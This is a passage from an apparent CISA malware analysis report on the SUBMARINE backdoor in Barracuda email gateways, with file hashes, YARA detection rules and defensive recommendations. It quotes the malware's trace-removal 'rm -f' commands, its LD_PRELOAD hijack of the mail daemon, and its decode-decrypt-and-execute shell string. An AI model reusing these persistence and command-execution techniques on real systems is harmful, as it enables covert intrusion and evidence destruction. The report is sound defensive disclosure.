<td>6:JkKgPxJooRKGKBNvd/UntDEcQwj7bPfNcgUBZqcL0FcXfFtC2i+RKGKBNvSv:alZJoospwtIclTNcRDnv7CJ+spSv</td>
</tr><tr><th>Entropy</th>
<td>5.713942</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-05"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "hides-artifacts hides-executing-code infects-files installs-other-components"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "remote-access exploitation"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43"<br />
				   strings:<br />
				       $s1 = { 73 6c 65 65 70 }<br />
				       $s2 = { 7c 62 61 73 65 36 34 20 2d 64 }<br />
				       $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 }<br />
				       $s4 = { 2f 68 6f 6d 65 2f 70 72 6f 64 75 63 74 2f 63 6f 64 65 2f 66 69 72 6d 77 61 72 65 2f 63 75 72 72 65 6e 74 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c 20 72 65 73 74 61 72 74 }<br />
				       $s5 = { 65 63 68 6f 20 2d 6e 20 27 }<br />
				       $s6 = { 73 68 }<br />
				       $s7 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				   condition:<br />
				       filesize &lt; 2KB and 6 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'hw-set' is a SUBMARINE artifact. The file is a shell script located in the '/boot/os_tools/' directory and contains shell commands as well as a base64 encoded string (Figure 5). The script first sleeps for 2 minutes. A 'grep' command then checks whether the string 'LD_PRELOAD' is present in the 'smtpctl' file located at '/home/product/code/firmware/current/sbin/'. The exclamation point (!) in front of the 'grep' command negates its exit status, so the conditional block runs only when 'grep' does not find the string. In that case the base64 encoded 'sed' command is decoded and executed to modify 'smtpctl' (Figure 6), re-establishing the 'LD_PRELOAD' hook whenever it is absent.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%205.jpg?itok=HF4R029D" width="558" height="144" alt="Figure 5" /></div>
  </figure><p><strong>Figure 5. - </strong>The contents of the shell script in the file 'hw-set'.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%206.jpg?itok=h1WbEvJk" width="600" height="54" alt="Figure 6" /></div>
  </figure><p><strong>Figure 6. - </strong>The decoded base64 string contained in the shell script of the file 'hw-set'.</p>
<h4>cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>smtpctl</td>
</tr><tr><th>Size</th>
<td>3759 bytes</td>
</tr><tr><th>Type</th>
<td>POSIX shell script, ASCII text executable</td>
</tr><tr><th>MD5</th>
<td>35a432e40da597c7ab63ff16b09d19d8</td>
</tr><tr><th>SHA1</th>
<td>b798b881b89526051ee5d50f24239b3a952c9724</td>
</tr><tr><th>SHA256</th>
<td>cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a</td>
</tr><tr><th>SHA512</th>
<td>af6aa47f44e604a60930f122ebd47d6c1b83c756b005d79ade8af147bfbfab40f16ba91e32021d65b18b21e06911476fb5d03f050850c8300d1e7d7a3e61c36b</td>
</tr><tr><th>ssdeep</th>
<td>48:t7c4VFuL2/zkanTvNpofcgBnY5NBFTGc5FjJWgkFBhhkQ1jtbA5lwmNdBITf3K3M:xcOko1iyGc6FzKAjDTvssgRaI7Q</td>
</tr><tr><th>Entropy</th>
<td>5.178501</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_05 : SUBMARINE trojan backdoor remote_access_trojan compromises_data_integrity cleans_traces_of_infection hides_artifacts installs_other_components remote_access exploitation<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-05"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "compromises-data-integrity cleans-traces-of-infection hides-artifacts installs-other-components"<br />
				       Malware_Type = "trojan backdoor remote-access-trojan"<br />
				       Tool_Type = "remote-access exploitation"<br />
				       Description = "Detects SUBMARINE launcher script samples"<br />
				       SHA256_1 = "cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a"<br />
				   strings:<br />
				       $s1 = { 4c 44 5f 50 52 45 4c 4f 41 44 }<br />
				       $s2 = { 23 21 20 2f 62 69 6e 2f 73 68 }<br />
				       $s3 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 2f 6c 69 62 75 74 69 6c 2e 73 6f 20 65 78 65 63 }<br />
				       $s4 = { 3e 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 }<br />
				       $s5 = { 62 73 6d 74 70 64 20 63 6f 6e 74 72 6f 6c 20 73 63 72 69 70 74 }<br />
				       $s6 = { 42 53 4d 54 50 44 5f 50 49 44 }<br />
				       $s7 = { 2f 72 65 6c 6f 61 64 2f 72 65 73 74 61 72 74 }<br />
				   condition:<br />
				       filesize &lt; 6KB and 6 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'smtpctl' is a SUBMARINE loader. The file is a maliciously modified copy of the BSMTP daemon control script, used to remove mail files in two directories and to load SUBMARINE as a shared library into the Batched Simple Mail Transfer Protocol (BSMTP) daemon.</p>
<p>			~Begin File Removal Commands~<br />
			rm -f /mail/scan/body*<br />
			rm -f /mail/tmp/mimeattach.*<br />
			~End File Removal Commands~</p>
<p>			Malicious code appended at the bottom of 'smtpctl' sets BSMTP_ID and preloads SUBMARINE ('libutil.so') as a shared library from the '/boot/os_tools' directory before executing the BSMTP daemon. If the BSMTPD_PID variable is set, debug mode is enabled; if it is not set, execution continues without debug mode. Additionally, any instance of the string 'reload' in the command is replaced with 'restart' (presumably so that a reload always becomes a full restart that re-applies the 'LD_PRELOAD'), and all errors are redirected to '/dev/null' (Figure 7).</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%207.jpg?itok=8lWrjKgq" width="575" height="87" alt="Figure 7" /></div>
  </figure><p><strong>Figure 7. - </strong>The appended malicious code loading SUBMARINE as the shared library for the BSMTP daemon. The BSMTP_ID value will be unique per device.</p>
<h4>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>libutil.so</td>
</tr><tr><th>Name</th>
<td>update_version</td>
</tr><tr><th>Size</th>
<td>9396 bytes</td>
</tr><tr><th>Type</th>
<td>ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped</td>
</tr><tr><th>MD5</th>
<td>b745626b36b841ed03eddfb08e6bb061</td>
</tr><tr><th>SHA1</th>
<td>cb20b167795db258b307ddee91ded87a9e7562d0</td>
</tr><tr><th>SHA256</th>
<td>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</td>
</tr><tr><th>SHA512</th>
<td>d6b9dfc9b784ca76386cbbf2c75c7e0ad3ac45e4420a838bc21b1464d07208f46901d7a0c8fbeca90303ce48720d7fd60b76d25cfebf5ea5b385e6b9db10ed98</td>
</tr><tr><th>ssdeep</th>
<td>96:dVdsadO5BT/aucX3Qa/c2D1UKDUzW1MuBFQC0NysEuSobXoWhP:yadO5B71cX3Qgc2uKD+aMLC01EuSo</td>
</tr><tr><th>Entropy</th>
<td>3.466134</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr><tr><th>Path</th>
<td>/boot/os_tools/libutil.so</td>
</tr><tr><th>Path</th>
<td>/boot/os_tools/update_version</td>
</tr><tr><th>Path</th>
<td>/var/tmp/libutil.so</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_01 : SUBMARINE trojan backdoor remote_access_trojan remote_access information_gathering exploitation determines_c2_server controls_local_machine compromises_data_integrity<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10452108"<br />
				       Date = "2023-06-29"<br />
				       Last_Modified = "20230711_1500"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "determines-c2-server controls-local-machine compromises-data-integrity"<br />
				       Malware_Type = "trojan backdoor remote-access-trojan"<br />
				       Tool_Type = "remote-access information-gathering exploitation"<br />
				       Description = "Detects SUBMARINE Barracuda backdoor samples"<br />
				       SHA256_1 = "81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab"<br />
				   strings:<br />
				       $s1 = { 32 35 30 2d 6d 61 69 6c 32 2e 65 63 63 65 6e 74 72 69 63 2e 64 75 63 6b }<br />
				       $s2 = { 6f 70 65 6e 73 73 6c 20 61 65 73 2d 32 35 36 }<br />
				       $s3 = { 65 63 68 6f 20 2d 6e 20 27 25 73 27 20 7c 20 62 61 73 65 36 34 20 2d 64 }<br />
				       $s4 = { 2d 69 76 }<br />
				       $s5 = { 48 65 6c 6c 6f 20 25 73 20 5b 25 73 5d 2c 20 70 6c 65 61 73 65 64 20 74 6f 20 6d 65 65 74 20 79 6f 75 }<br />
				       $s6 = { e8 47 fa ff }<br />
				       $s7 = { 63 6f 6d 6d 61 6e 64 }<br />
				       $s8 = { 2d 69 76 20 36 39 38 32 32 62 36 63 }<br />
				       $s9 = { 73 65 6e 64 }<br />
				       $s10 = { 73 6f 63 6B 65 74 }<br />
				       $s11 = { 63 6f 6e 6e 65 63 74 }<br />
				   condition:<br />
				       filesize &lt; 15KB and 8 of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Relationships</h5>
<table><tbody><tr><td>81cf3b162a...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr></tbody></table><h5>Description</h5>
<p>The file 'libutil.so' is the SUBMARINE payload. 'libutil.so' is preloaded into the BSMTP daemon, the Linux executable responsible for receiving emails, and processing Simple Mail Transfer Protocol (SMTP) reply messages. Linux Shared Object Preloading is analogous to Dynamic-Link Library (DLL) side loading and DLL injection in the Windows OS.</p>
<p>			This file is preloaded using the 'LD_PRELOAD' parameter, applied to 'bsmtpd', the BSMTP daemon executable. The preload parameter is added to two configuration files that control the behavior of 'bsmtpd'. When the daemon is restarted from those configuration files, 'libutil.so' is loaded into its process memory, giving it the same privileges and access as 'bsmtpd'.</p>
<p>			The malware obtains the BSMTP_ID environment variable from the infected system. The BSMTP_ID has the capacity to be used as a port for malicious traffic (Figure 8). The process this shared object file is running in, 'bsmtpd', is duplicated and launched using the 'fork' Linux function (Figure 9). The malware opens a connection to 127.0.0.1 on the victim machine it is running on (Figure 10). The 'recv' function is called after the connection is opened, showing that the malware has the capacity to obtain information from the context/environment it is executed in.</p>
<p>			Figure 11, Pane 1, shows configuration settings for the BSMTP daemon that allow any email traffic for the address range 127/8 and multiple actions, including 'ehlo'. Pane 2 shows the malware taking in data and loading the 'ehlo' action into memory.</p>
<p>			Figure 12, Pane 1, shows the malware, in conjunction with 'snprintf_chk', printing the string 'echo -n '%s' | base64 -d | openssl aes-256-cbc -d -K 66833b26%d -iv 69822b6c%d 2&gt;/dev/null | sh' to the Linux shell. The string is a command that accepts input '%s', decodes it with Base64, decrypts it with AES, discards errors by redirecting them to /dev/null, and executes the result on the target with the 'sh' shell and the 'system' Linux function. Lastly, the malware has the capacity to print the SMTP string '250-mail2.eccentric.duck Hello %s [%s], pleased to meet you'. Given this information, the malware has the capacity to accept encoded and encrypted inputs from 'bsmtpd', execute them, and print a message.</p>
<h5>Screenshots</h5>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%208.jpg?itok=-eGOUnFk" width="600" height="297" alt="Figure 8" /></div>
  </figure><p><strong>Figure 8. - </strong>Depicts the Linux function 'getenv' reading "BSMTP_ID" and setting the variable named "SRC_PORT".</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%209.jpg?itok=xAi2pFrr" width="600" height="118" alt="Figure 9" /></div>
  </figure><p><strong>Figure 9. - </strong>Depicts the Linux function 'fork.'</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%2010.jpg?itok=70DSncLG" width="600" height="465" alt="Figure 10" /></div>
  </figure><p><strong>Figure 10. - </strong>Depicts the initialization of a connection using the Berkeley Sockets API.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%2011.jpg?itok=UJbtWBNb" width="600" height="333" alt="Figure 11" /></div>
  </figure><p><strong>Figure 11. - </strong>Pane 1 shows configuration settings for the BSMTP daemon, not in the malware. Pane 2 shows part of that configuration in the malware.</p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image u-align-center" role="group"><div class="c-figure__media">  <img loading="lazy" src="/sites/default/files/styles/large/public/2023-07/AR23-209A%20Figure%2012.jpg?itok=JJohF63k" width="600" height="305" alt="Figure 12" /></div>
  </figure><p><strong>Figure 12. - </strong>Pane 1 shows the Linux functions 'snprintf_chk' and 'system'. Pane 2 shows configuration settings for the BSMTP daemon.</p>
<h3>Relationship Summary</h3>
<table><tbody><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab</td>
</tr><tr><td>6dd8de093e...</td>
<td>Contains</td>
<td>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a</td>
</tr><tr><td>bbbae0455f...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr><tr><td>81cf3b162a...</td>
<td>Contained_Within</td>
<td>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0</td>
</tr></tbody></table><h3>Recommendations</h3>
<p>CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.</p>
<ul><li>Maintain up-to-date antivirus signatures and engines.</li>
<li>Keep operating system patches up-to-date.</li>
<li>Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.</li>
<li>Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.</li>
<li>Enforce a strong password policy and implement regular password changes.</li>
<li>Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.</li>
<li>Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.</li>
<li>Disable unnecessary services on agency workstations and servers.</li>
<li>Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).</li>
<li>Monitor users' web browsing habits; restrict access to sites with unfavorable content.</li>
<li>Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).</li>
<li>Scan all software downloaded from the Internet prior to executing.</li>
<li>Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).</li>
</ul><p>Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, <strong>"Guide to Malware Incident Prevention &amp; Handling for Desktops and Laptops".</strong></p>
<h3>Contact Information</h3>
<ul><li>1-888-282-0870</li>
<li><a href="mailto:CISAservicedesk@cisa.dhs.gov">CISA Service Desk</a> (UNCLASS)</li>
<li><a href="mailto:NCCIC@dhs.sgov.gov">CISA SIPR</a> (SIPRNET)</li>
<li><a href="mailto:NCCIC@dhs.ic.gov">CISA IC</a> (JWICS)</li>
</ul><p>CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: <a href="https://us-cert.cisa.gov/forms/feedback/">https://us-cert.cisa.gov/forms/feedback/</a></p>
<h3>Document FAQ</h3>
<p><strong>What is a MIFR?</strong> A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.</p>
<p><strong>What is a MAR?</strong> A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.</p>
<p><strong>Can I edit this document?</strong> This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or <a href="mailto:CISAservicedesk@cisa.dhs.gov">CISA Service Desk</a>.</p>
<p><strong>Can I submit malware to CISA?</strong> Malware samples can be submitted via three methods:</p>
<ul><li>Web: <a href="https://malware.us-cert.gov">https://malware.us-cert.gov</a></li>
<li>E-Mail: <a href="mailto:submit@malware.us-cert.gov">submit@malware.us-cert.gov</a></li>
<li>FTP: ftp.malware.us-cert.gov (anonymous)</li>
</ul><p>CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at <a href="http://www.cisa.gov">www.cisa.gov</a>.</p>
<h3>Acknowledgments</h3>
<p>Mandiant contributed to this report.</p>
</td>
</tr></tbody><tfoot><tr><td> </td>
</tr></tfoot></table>
      </div>

  
      </div>
  </div>
            </div>
        <div class="l-full__footer">

          </div>
  </div>
  
  
  
  

      </div>

  
  </main>

  



</div>

  </div>

    

  </body>
</html>
